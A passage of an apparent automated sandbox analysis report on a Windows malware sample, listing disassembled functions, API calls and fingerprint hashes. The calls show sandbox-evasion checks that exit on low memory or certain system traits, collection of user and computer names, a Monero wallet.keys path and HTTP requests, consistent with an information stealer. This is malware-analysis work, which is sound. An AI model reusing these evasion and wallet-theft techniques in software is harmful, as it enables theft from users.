                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0048757F
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487603
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0048760A
                    • wsprintfA.USER32 ref: 00487640
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                    • String ID: :$C$\$I
                    • API String ID: 1544550907-2636280491
                    • Opcode ID: 6746fbcdc5b2406351be08b1f3867355671c3909e746cccffe45cd4572b1668e
                    • Instruction ID: 0cd46ac30d74b8a1c1641622ec5f94c47e433e7a31435508609a27c424df082d
                    • Opcode Fuzzy Hash: 6746fbcdc5b2406351be08b1f3867355671c3909e746cccffe45cd4572b1668e
                    • Instruction Fuzzy Hash: 1F4194B1D04248ABDB10EF94DC55BDEBBB8EF08714F10459EF50967280D778AA84CBA5
                    Function 004869F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01232290), ref: 004898A1
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01232188), ref: 004898BA
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01232230), ref: 004898D2
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012321B8), ref: 004898EA
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012321E8), ref: 00489903
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012391E0), ref: 0048991B
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01225570), ref: 00489933
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012255B0), ref: 0048994C
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012322C0), ref: 00489964
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012322A8), ref: 0048997C
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01232308), ref: 00489995
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012323F8), ref: 004899AD
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,012254D0), ref: 004899C5
                      • Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01232428), ref: 004899DE
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 004711D0: ExitProcess.KERNEL32 ref: 00471211
                      • Part of subcall function 00471160: GetSystemInfo.KERNEL32(?), ref: 0047116A
                      • Part of subcall function 00471160: ExitProcess.KERNEL32 ref: 0047117E
                      • Part of subcall function 00471110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0047112B
                      • Part of subcall function 00471110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00471132
                      • Part of subcall function 00471110: ExitProcess.KERNEL32 ref: 00471143
                      • Part of subcall function 00471220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0047123E
                      • Part of subcall function 00471220: __aulldiv.LIBCMT ref: 00471258
                      • Part of subcall function 00471220: __aulldiv.LIBCMT ref: 00471266
                      • Part of subcall function 00471220: ExitProcess.KERNEL32 ref: 00471294
                      • Part of subcall function 00486770: GetUserDefaultLangID.KERNEL32 ref: 00486774
                      • Part of subcall function 00471190: ExitProcess.KERNEL32 ref: 004711C6
                      • Part of subcall function 00487850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004711B7), ref: 00487880
                      • Part of subcall function 00487850: RtlAllocateHeap.NTDLL(00000000), ref: 00487887
                      • Part of subcall function 00487850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0048789F
                      • Part of subcall function 004878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487910
                      • Part of subcall function 004878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00487917
                      • Part of subcall function 004878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0048792F
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01239170,?,0049110C,?,00000000,?,00491110,?,00000000,00490AEF), ref: 00486ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00486AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00486AF9
                    • Sleep.KERNEL32(00001770), ref: 00486B04
                    • CloseHandle.KERNEL32(?,00000000,?,01239170,?,0049110C,?,00000000,?,00491110,?,00000000,00490AEF), ref: 00486B1A
                    • ExitProcess.KERNEL32 ref: 00486B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                    • String ID:
                    • API String ID: 2525456742-0
                    • Opcode ID: 9d8793d9fcd3c693680624316de4629464d578c1c4762df50f78759331bd5c8a
                    • Instruction ID: e1a048ee0071cc31808b448249f2aba5b324e776b99f0c07290ef6ea132cd7f9
                    • Opcode Fuzzy Hash: 9d8793d9fcd3c693680624316de4629464d578c1c4762df50f78759331bd5c8a
                    • Instruction Fuzzy Hash: 9B311E71904208AAEB04F7E1DC56BEE7739AF04304F10496FF112A6192DFBC6945C7AA
                    Function 00471220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1436 471220-471247 call 4889b0 GlobalMemoryStatusEx 1439 471273-47127a 1436->1439 1440 471249-471271 call 48da00 * 2 1436->1440 1442 471281-471285 1439->1442 1440->1442 1444 471287 1442->1444 1445 47129a-47129d 1442->1445 1447 471292-471294 ExitProcess 1444->1447 1448 471289-471290 1444->1448 1448->1445 1448->1447
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0047123E
                    • __aulldiv.LIBCMT ref: 00471258
                    • __aulldiv.LIBCMT ref: 00471266
                    • ExitProcess.KERNEL32 ref: 00471294
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                    • String ID: @
                    • API String ID: 3404098578-2766056989
                    • Opcode ID: c169da84fef3fd6c53ca0bb048d8577358745e376a51be03929fc7d38d53a04c
                    • Instruction ID: 21337400f32bcaaf6a722c11d86a3c57503d42cf3020d2a6c658fee0f82be385
                    • Opcode Fuzzy Hash: c169da84fef3fd6c53ca0bb048d8577358745e376a51be03929fc7d38d53a04c
                    • Instruction Fuzzy Hash: 5C016DB0D44308FAEB10EBE4DC49BDEBB78AB04705F20858AE709B62D1D7785941879D
                    Function 00486AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1450 486af3 1451 486b0a 1450->1451 1453 486aba-486ad7 call 48aad0 OpenEventA 1451->1453 1454 486b0c-486b22 call 486920 call 485b10 CloseHandle ExitProcess 1451->1454 1459 486ad9-486af1 call 48aad0 CreateEventA 1453->1459 1460 486af5-486b04 CloseHandle Sleep 1453->1460 1459->1454 1460->1451
                    APIs
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01239170,?,0049110C,?,00000000,?,00491110,?,00000000,00490AEF), ref: 00486ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00486AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00486AF9
                    • Sleep.KERNEL32(00001770), ref: 00486B04
                    • CloseHandle.KERNEL32(?,00000000,?,01239170,?,0049110C,?,00000000,?,00491110,?,00000000,00490AEF), ref: 00486B1A
                    • ExitProcess.KERNEL32 ref: 00486B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                    • String ID:
                    • API String ID: 941982115-0
                    • Opcode ID: 627695089eb96dfbe65d29d220d9089b584b76264625a493db0f58cb1ac4bc76
                    • Instruction ID: 080a5fc73e2fe60d257de9be255cead15236a871011debc00b0696390d2e56d1
                    • Opcode Fuzzy Hash: 627695089eb96dfbe65d29d220d9089b584b76264625a493db0f58cb1ac4bc76
                    • Instruction Fuzzy Hash: ACF03AB0944219AAE740FBA09C06BBE7B34EB04705F114E1AF512A12C1DBF96981D75B
                    Function 004747B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CrackInternetlstrlen
                    • String ID: <
                    • API String ID: 1274457161-4251816714
                    • Opcode ID: 00712f95e145abe199289d1497ef23af860f3b2ca73dcb267bdec721ae7b8268
                    • Instruction ID: 82ab199545416e96a3f51836d500ecb92b75d69c6c94f67e8b3eaceaa17e0f5e
                    • Opcode Fuzzy Hash: 00712f95e145abe199289d1497ef23af860f3b2ca73dcb267bdec721ae7b8268
                    • Instruction Fuzzy Hash: 5D216FB1D00208ABDF14EFA5E845ADE7B75FB04320F10862AF919A72C0EB746A05CF91
                    Function 004851F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 00476280: InternetOpenA.WININET(00490DFE,00000001,00000000,00000000,00000000), ref: 004762E1
                      • Part of subcall function 00476280: StrCmpCA.SHLWAPI(?,0123E858), ref: 00476303
                      • Part of subcall function 00476280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00476335
                      • Part of subcall function 00476280: HttpOpenRequestA.WININET(00000000,GET,?,0123E298,00000000,00000000,00400100,00000000), ref: 00476385
                      • Part of subcall function 00476280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004763BF
                      • Part of subcall function 00476280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004763D1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00485228
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                    • String ID: ERROR$ERROR
                    • API String ID: 3287882509-2579291623
                    • Opcode ID: 68394b0f972cebbee60df293262e273e1c426ab8e9ee640bd2bf176549a0f73f
                    • Instruction ID: 0174d4b3077bb314ac40494ad62e481b3a60c2e7b88d0570749c3362a3f06e02
                    • Opcode Fuzzy Hash: 68394b0f972cebbee60df293262e273e1c426ab8e9ee640bd2bf176549a0f73f
                    • Instruction Fuzzy Hash: 73117730800008A7DB08FF65DD52AED3338AF40304F40495FF80A56592EF7CAB15CB6A
                    Function 004878E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487910
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00487917
                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0048792F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateComputerNameProcess
                    • String ID:
                    • API String ID: 1664310425-0
                    • Opcode ID: 26c3296a272dae15783e17672e176f0e250ccb049e8dd49008aa80d08af483b6
                    • Instruction ID: b72455174323a80419cc8abad70bd2410af90d5c145dda18009c7f9560230dab
                    • Opcode Fuzzy Hash: 26c3296a272dae15783e17672e176f0e250ccb049e8dd49008aa80d08af483b6
                    • Instruction Fuzzy Hash: B20186F1944204EFD700DF94DD45BAEBBB8F704B21F20461AF645E3680D37859408BA6
                    Function 00471110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0047112B
                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00471132
                    • ExitProcess.KERNEL32 ref: 00471143
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AllocCurrentExitNumaVirtual
                    • String ID:
                    • API String ID: 1103761159-0
                    • Opcode ID: 0bda4d3391a7298d9c6b5aae8fc5a44677b409c2c23d52ece3dba9f421c9a7a1
                    • Instruction ID: 37f3616787a6579acff57b788ffcb55a996646b960c0fb7545956d99e3d7bc90
                    • Opcode Fuzzy Hash: 0bda4d3391a7298d9c6b5aae8fc5a44677b409c2c23d52ece3dba9f421c9a7a1
                    • Instruction Fuzzy Hash: 08E086B0985348FBE7106BE4DC0AB4976B8EB04B01F105159F7087A5D0C6B526409699
                    Function 004710A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004710B3
                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004710F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID:
                    • API String ID: 2087232378-0
                    • Opcode ID: 234cb2fb83887244116228abd73772ab23810611198253ef0b7c210e2134ba1f
                    • Instruction ID: 601ae1a75bd9ff07285524ae3a99363c0ed73c1fb009980da8fb2b73a27519d3
                    • Opcode Fuzzy Hash: 234cb2fb83887244116228abd73772ab23810611198253ef0b7c210e2134ba1f
